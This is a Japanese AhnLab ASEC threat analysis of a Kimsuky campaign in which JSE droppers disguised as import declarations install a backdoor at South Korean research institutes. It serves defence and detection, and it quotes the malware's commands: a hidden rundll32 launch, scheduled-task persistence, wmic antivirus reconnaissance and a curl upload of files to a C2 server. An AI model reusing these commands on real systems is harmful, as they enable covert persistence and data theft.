輸入申告書を装い韓国国内の研究機関を狙う Kimsuky

AhnLab Security Emergency response Center(ASEC)は最近、Kimsuky 攻撃グループにより輸入申告書に偽装した不正な JSE ファイルが韓国国内の研究機関を対象に配布されていることを確認した。攻撃者は最終的にバックドアを利用して情報窃取およびコマンドを実行する。輸入申告書に偽装したドロッパーのファイル名は以下の通りである。

  • 輸入申告書_捺印.jse

ファイル内部には難読化された PowerShell スクリプト、Base64 でエンコードされたバックドアファイル、および正常な PDF が存在する。

[図1] 難読化された JSE ファイルの内部

PowerShell スクリプトにより「輸入申告書.PDF」のファイル名で正常な PDF が保存されて自動実行され、ファイル内部には攻撃対象の情報が含まれている。正常な PDF を生成および実行することにより、ユーザーに不正なバックドアファイルが実行中であることを認知されにくいようにしているものと推定される。

[図2] デコイファイル (輸入申告書.PDF)

バックグラウンドでは %ProgramData% パスに「vuVvMKg.i3IO」のファイル名でバックドアを生成し、rundll32.exe を利用してマルウェアを実行させる。

  • powershell.exe -windowstyle hidden rundll32.exe ProgramData\\vuVuMKg.i3IO UpdateSystem

実行されたマルウェアは持続性維持のために %ProgramData% パスと %Public% パスに「IconCache.db」のファイル名でコピーしたあと、タスクスケジューラ登録を実行する。

  • cmd.exe /c schtasks /create /tn iconcache /tr “rundll32.exe C:\Programdata\IconCache.db UpdateSystem /sc onlogon /rl highest /f

バックドアはシステム情報の窃取のために wmic コマンドによって攻撃対象の AntiVirus 状態を確認し、ipconfig コマンドによってネットワーク情報を収集する。

  • cmd.exe /U /c wimc /namespace:\\root\securitycenter2 path antivirusproduct get displayname > vaccine.txt
  • ipconfig /all

その後は Host Name、User Name、OS 情報等の情報を収集して検知を回避するためにコマンド実行結果をエンコードして C2 に送信する。

[図3] 収集されたシステム情報
[図4] エンコードされ送信される情報

また、システム情報の窃取を含む以下のコマンドを実行して被害システムでバックドアとしての役割を遂行し、curl ツールを用いて C2 サーバーへのアップロード機能までを実行する。

  • getinfo : システム情報
  • die : 終了
  • where : 実行パス
  • run : 特定ファイルおよびコマンドの実行
  • curl -k -F “fileToUpload=@%s” -F “id=%S” %s

このように、おとりドキュメントファイルと共に実行されるため、一般のユーザーはシステムがマルウェアに感染したことを認知できていないケースが多い。このようなタイプのマルウェアは特定の対象を狙って攻撃するため、出どころの分からないメールの添付ファイルを実行しないように注意する必要がある。

[ファイル検知]

  • Dropper/JS.Generic (2023.11.16.02)
  • Backdoor/Win.Nikidoor (2023.11.15.03)

[IOC]

  • MD5
    d2335df6d17fc7c2a5d0583423e39ff8
    d6abeeb469e2417bbcd3c122c06ba099
  • C2
    hxxp://rscnode.dothome.co[.]kr/index.php
    hxxp://rscnode.dothome.co[.]kr/upload.php

関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。

Categories: マルウェアの情報

Tagged as: ,